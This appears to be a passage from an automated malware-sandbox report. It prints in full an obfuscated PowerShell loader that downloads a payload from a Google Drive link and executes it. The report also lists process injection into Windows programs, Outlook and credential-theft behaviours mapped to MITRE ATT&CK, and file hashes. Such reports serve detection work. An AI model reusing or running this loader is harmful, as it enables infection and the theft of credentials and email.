      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Juttying Bankbetjentene Backwardly Gulvmaattes Kameluldsfrakke Kamerafoeringen Dieselpriser #>;$Polemisering='Departementsvalgraadets';<#Potencies Manipuleringers Surtouts Inexist Brddevgges Krogstrup Barometer #>;$Beterschap30=$host.PrivateData;If ($Beterschap30) {$Statsamters++;}function Skovsanger($polyribosome){$Kontinentalsoklernes=$polyribosome.Length-$Statsamters;for( $Tastearbejderne=5;$Tastearbejderne -lt $Kontinentalsoklernes;$Tastearbejderne+=6){$Afsluttede+=$polyribosome[$Tastearbejderne];}$Afsluttede;}function Wined($Sebastine){ . ($Skyggetilvrelsernes253) ($Sebastine);}$Truculentness=Skovsanger 'BobblMKonfeoRul izHobnoiP edelC agolSva.ea r.ch/Bidra5Damok. M st0Figbi Re en(ThousWM ddeiJog inRorsmdTaroko C ttwSkimlsParad Medd.N AareT,icro Tilba1Scree0Archp.Ove p0G,tea;slage SpaltWBetoniBi onnAlbru6 Rso 4S,cia;Progr velgrxKar o6Ansg.4 Ange;ating Kamerr DetevMulta:archw1Ami,p2Blott1Liqua.Insci0Co.po)Tipie Adre GP,edeePa.atcSk ldk Dicho T,rm/Manin2Huber0 Lab,1fasth0 Skab0Opgav1Occur0Def n1Drogu LuisaFSenniiSwashrSidese edalfDrnhaoSti uxAlpel/ Volu1ocurr2 High1Prete.Banan0 G.ip ';$Arbejderfamilie=Skovsanger 'RegenUsget SOverbE He iR Grim-Ers aaSawargMisleeLi.atN Erstt,esic ';$Trekantdramaers12=Skovsanger 'a lejhNonretskrivtBedrvpOrthos Al a: C eq/Menox/ SnyddFdrelr ChnuiPsychv Sp ieForsi.AscengLinieoTelefochassg RefelCloakeBisi..TimotcPatt,oGammem dyk /C raluelud,cBeto ?.evefeKlo kxLreplpacromoOver.r G,mmtProse=Vovend.nfreoFor.bwVittun Pro lUnderoUn ecaRakufdConsi&softfi DispdDuroq=Reali1HeediIDisp LCon euNeurap O tlkTeathJ Res.xOverwZ Sor QRatioIDocumm.onspTKarriN GranY Mirr3 mblQBrian9 Aerox Kvad7Scuffe GlarOHegelS elteMNonpa4ResallInducn eace_EndowiDisart D,rs7 SlenWC,ackK,nmot ';$kalkerpapirer=Skovsanger 'Fumin> ann ';$Skyggetilvrelsernes253=Skovsanger 'UntasIyammeEPeri.XM rab ';$Klostret='Braid';$Detroniseringers235 = Skovsanger ' Gor e Gaa.cInterhUnscroal.am Rhaet%IridoaSt rapEcophp altodSaxataSid utLuftfaUnbel%Tilli\InterA Fst lscintvN tvriThamulS ivedFrpere TortsMisbe. H,rsSAlethcA.alyy Carb Ench&Reper& Ve.t FoyseeSangscCo,kbh rgaoFiltn oph.ttOsmol ';Wined (Skovsanger 'Chris$DeforgProvolCurb oAfdknbForbiaStorklshott:Neut Tskatti ncomNoncoeBu.nilK unsoSmaapf tormtprogreUnderrForwanEradieGy.it=Ha pu(ForwacSacham VitedTriko hudso/Sma,pc Proj Knott$Tipt DRubypeGrac tSvederDr ngoHumlenbutikiUn apsCivileConserUmageiKvivan OprrgSpejleUngenr k nssHersa2Accts3Brach5Heina)Skatt ');Wined (Skovsanger 'Kvlde$Rrelsg BewrlBahamoH ggeb Dt,iaSaliglUdmug: UnpeC PhonaceriutBestye ystl.rres=Trass$CompaTSolosrT,rtueslagvk RipeaCountnhypomtTandpdfljt rarranafieldmQuatea SurfeBenzir Raavsfibul1 Gr c2Hustu.O tstsSan tpDeadnlCafetiTalmutGroce(Rh bd$MxdwokClangaSpolelGestikBankbeUforsrAtomtpY.ntnaUmiddpPedoliUnprorFirkeePeachrQuote)ingen ');Wined (Skovsanger 'Epilh[ ArisN.patteFlannt wal.unsinSMacadezealor YorkvbodsviCallic angre k lkPSlakioPlatiiTrivinSvejst SubdMEp,rta etspnI looaP.ttyg C.taeProter Awkw]Fr va: Dist:VestvS ryppeOverncRenseu uperrFeteri FalsttekstypluraPUsmidrAntenoFemogtDefanoSlutncstanco AgnalTakke Enevl=Popul Sca e[breezN Resee Dra t,ngag.Mini S Sal e,ranicUniv u nderr strainavnktA smey P,agPFost rG uldoLit,itS ileoG sfocAtheroegnsplWilliTOmklayNuancpPrekneisrae]Eng.n:S,riv:SlackTRoys,lepidesInme,1 Re.b2Galva ');$Trekantdramaers12=$Catel[0];$Tsutsutsi= (Skovsanger 'Staa $Ce trGscabel.udesO Im.ebIsabea TilslKanal: elloROnk,eo,elegn TrouK odmaeVirksdThingO ountrIm,taS Stud=Su.erNFjer E IsocwSkrve-S rghoYo hubSus ejIsoceE voucCAudietNon l UndersHookuyMaskes TempTFjel,E lesmCavet. magN FejlECask T vejr. FurbwHelinePot ubSubagc Al.ulc ntrI Af eEAmat,NOverdt');$Tsutsutsi+=$Timelofterne[1];Wined ($Tsutsutsi);Wined (Skovsanger 'Binom$ UdserInfero ChinnScrubkRa doeToye dKroneo BundrHoydasFinge.Theo HP osteshortaCir ud raa eS allrst,rrsClea [Feltp$dis,oAF ilurDeltrb K tieBambujEposedEyebae forlr GofffHeropa V tfm reyiLyskolOverdiThoreeDi.tr]Krvel=Pro.e$ nvoiTInexcr ,irkuSomatcFaileuSkattlThiodeGlyconFortytMeta n .ncee NedfsSper,s Er v ');$adumbrating=Skovsanger ' Farm$ heemrStakaoAutoknRntgek ilkeePu hidSjusso L ngr Bo gs chro. SheiDSkopuoIrregw Almin Antil Funko TempaStjerd AlloFCleuciSwashlProdueAnbra(Antel$ RubbTUmorsrBenzoeF xnuk issa BalinHighpt IntedF rvar AffiaUndepmH,rmia FataeIsolarNeurasretun1Spejl2Pyrrh,I,sti$ versCMisy aEdentsUkuletunimaiLaetslRentriHinduaCadisn TapesSverikDecer)Andag ';$Castiliansk=$Timelofterne[0];Wined (Skovsanger 'Nedsk$ KoblG W,nrlColonOFixedB BureaevolulEvolv:Desinn atirOSpindNP ykoOFe ryc SvinCPro auS.btlP PeteAPreconOvergcPlagieT.ves= Fl l( UnprTGumpee Br gS QuarTBeeme-CoproP FlecaGazint darwHUnslu S.st$R.tuaCOve sAEldonsFetatT PariIHjrneLs.julikortba AfslN Tamps LejlkHydra)Jaukn ');while (!$Nonoccupance) {Wined (Skovsanger 'Bloc,$Zin kgPag tlO,erfoPastibOstraasommalGol e: Bl nPFusere La.rrA,ertiOp oskBeachuParkamS mbaeLuxurnResatsTeate=Galjo$TrkkotKolacrSko suUdseeeIndfa ') ;Wined $adumbrating;Wined (Skovsanger 'PolleS KonttFerieaPapporG avht Appe-FuskeS DianlblackeLiv feUnimppklker Komm4 cale ');Wined (Skovsanger 'Udski$Keenag AnellLanghoMorribVandfaTeatrl C pi:Re,igNSylt oAmninn TidsoMyxovc agecBlathuAppospStoffaHardwn StaacKil weSk.le=Naadi(AgeusTFeldieMegadsIndhot Klde-BssekPh rrea,ekantO eishEnh d .olke$HoffmC Pr sa Atoms LysttMcneiiInstrlLsrivioclocaForstnstrdesAbstikIncon)Ek ek ') ;Wined (Skovsanger 'Pr nt$Vaco,gLeucolGrueloBortlb ypopaCordolSteph:UndefNApophoUnsh nTangeoFolkebPolycsmaaneeManomrHutiavDo,siaOverlnBar.ecGenaneGgesksRatsb=Reco.$.ryllgKedellVerdeoDialibProtoaKindtl anm:FortiPriferr UvejeLaartd Fol.iTilkasUnpercSukkerResteiSo,tim Rat iSaaninSynera UafstD bbee.rimmdBlind7Handm7Inte +Fa ou+Minis% Flyv$ no.tCKludgaDefrot Brite Clegl Kore.Hyp.pc esuoAftllu Svign StattAp co ') ;$Trekantdramaers12=$Catel[$Nonobservances];}$Abdaria=298727;$Detinet=29520;Wined (Skovsanger 'Styrt$UncifgRevollb.lleoBhadobR deraUdvallFarms: ondiHantecvOvermi Fortd ,nivbNedrigPostke For r Ordb Salm=jules Ch orG CymbeAshietUntil-BelugC BundoAmph.nPaatet,iscoe SammnFortats ott Sculp$ onprCPopolaPrkensLuft tstolpi For.l TraniRigd aUnd rnEternsPh lokSiden ');Wined (Skovsanger 'F erc$AcrosgMak olrensko.ortebE straShapalInlym:ForhaUNicomn Chylcre leoK edidHenredBillelDispee Ht edMil s Ta ke=Ewryb arth[Povl.SWe ghyRerousHal,ttAmphieReglemVit l. CompCSkem o tr rn edrv Fe deDrainrForgltKamuf] Biot:Cursu: SyneF SkatrSn.seo D.anm ha.eBU.creaZestis QuipeCabal6Mycos4 FonoSIc.notPhonorKalveibillin C.opgDe os(aceto$Dyea H SkrmvConnii VetedOpholb AdelgF rvaeMagnerSpag.)Pren. ');Wined (Skovsanger 'Randi$ ofteg RedelEmagroSquibb Gldsa delslbozal:Hvl eCRappeiBestyr adj c IndsuBrn pmItch,sKir bc WillrBomb i.ovtwvSkafte Houh Forre=Poisu Cirke[pola S b,gsysvej sRa grt Evape Afk mWoode.panhaT kineFors x.ookit Dump.GlemmEbebudnReclic ZeosoRustldMediciAlkenn skatgBerap] Nona:Debla:,emerABrac,S BestC opcaIBacksIBetwe.UlushGBaetyeKatabtUnscaS OmsttTraphr mphijoinin .empgSk ks(epiku$ForeoUH,mozn rrkncBestrooystcd Hr,pd ,ibilRepubeG ocedArmbr) Pla, ');Wined (Skovsanger ',iutl$InstrgGi.oelD.sgro,arfubGingiaNysnvl rchm:Dep sA.hytodPinbauJulemmHaemobCali,rNonfeaOffentHaglbi Datao Kis n Koalstoot =Lynak$SpiraCOverciAmmedrProgrcUnsaluRo.tem UnresV,rdecC rberD rehi.wangv.ibrseBilbo.CompusUn.oquKen,abTalsts BeratSwandrTotaliEjdamnAdskigHjemk(Regob$IrideACa onbPr grdOlympa vlstrWadmaiMounda Soll, uckh$Zig,aD Renle Herrt R.beiSturdnsbeboePunilt urus)Subto ');Wined $Adumbrations;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3432
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Alvildes.Scy && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4732
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4680
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:5068
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:2536
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4028
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:4620
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:1616
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:540
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:1420
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:436
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:2812
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        
        PID:3800
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:968
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4188
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4648
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4688
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4364
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4440
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:2252
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:1484
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4628
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:1900
    - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
        
        "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
        5⤵
        
        PID:2240
    - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
        
        "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ks203vn4.lkv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Alvildes.Scy

Filesize
427KB

MD5
2e657763f33de5fb5312b56539651192

SHA1
be646a64dbc03990074f938879b49df064eb82f3

SHA256
d684e7ad8a8ad72c2b2b2c107aaf8674102aea6fcffdfc6487894b5e3e457bc7

SHA512
2903a39196c0c2942d7d2b72d67dbc35532de96acd5121577ad3a29470247477b32bcec1c5f3f4d8b1fdcf2824014a52e99948783a635fa6cdd4592a6f82269d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2629364133-3182087385-364449604-1000\0f5007522459c86e95ffcc62f32308f1_83e33dcf-e635-4313-9cdc-036589dffc77

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2629364133-3182087385-364449604-1000\0f5007522459c86e95ffcc62f32308f1_83e33dcf-e635-4313-9cdc-036589dffc77

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
memory/692-57-0x00000000005F0000-0x00000000018A7000-memory.dmp

Filesize
18.7MB

Download
memory/692-44-0x00000000005F0000-0x00000000018A7000-memory.dmp

Filesize
18.7MB

Download
memory/3432-17-0x0000000005690000-0x0000000005CB8000-memory.dmp

Filesize
6.2MB

Download
memory/3432-33-0x00000000063D0000-0x00000000063EE000-memory.dmp

Filesize
120KB

Download
memory/3432-18-0x0000000005500000-0x0000000005522000-memory.dmp

Filesize
136KB

Download
memory/3432-19-0x00000000055A0000-0x0000000005606000-memory.dmp

Filesize
408KB

Download
memory/3432-20-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
memory/3432-30-0x0000000005DB0000-0x0000000006104000-memory.dmp

Filesize
3.3MB

Download
memory/3432-42-0x0000000008D50000-0x000000000A007000-memory.dmp

Filesize
18.7MB

Download
memory/3432-39-0x00000000087A0000-0x0000000008D44000-memory.dmp

Filesize
5.6MB

Download
memory/3432-34-0x0000000006420000-0x000000000646C000-memory.dmp

Filesize
304KB

Download
memory/3432-16-0x0000000002BB0000-0x0000000002BE6000-memory.dmp

Filesize
216KB

Download
memory/3432-36-0x0000000007530000-0x000000000754A000-memory.dmp

Filesize
104KB

Download
memory/3432-35-0x0000000007B70000-0x00000000081EA000-memory.dmp

Filesize
6.5MB

Download
memory/3432-38-0x0000000007600000-0x0000000007622000-memory.dmp

Filesize
136KB

Download
memory/3432-37-0x0000000007670000-0x0000000007706000-memory.dmp

Filesize
600KB

Download
memory/4304-31-0x00007FFFB7E93000-0x00007FFFB7E95000-memory.dmp

Filesize
8KB

Download
memory/4304-32-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-41-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-0-0x00007FFFB7E93000-0x00007FFFB7E95000-memory.dmp

Filesize
8KB

Download
memory/4304-43-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-15-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-12-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-60-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-11-0x00007FFFB7E90000-0x00007FFFB8951000-memory.dmp

Filesize
10.8MB

Download
memory/4304-6-0x000002216AFA0000-0x000002216AFC2000-memory.dmp

Filesize
136KB

Download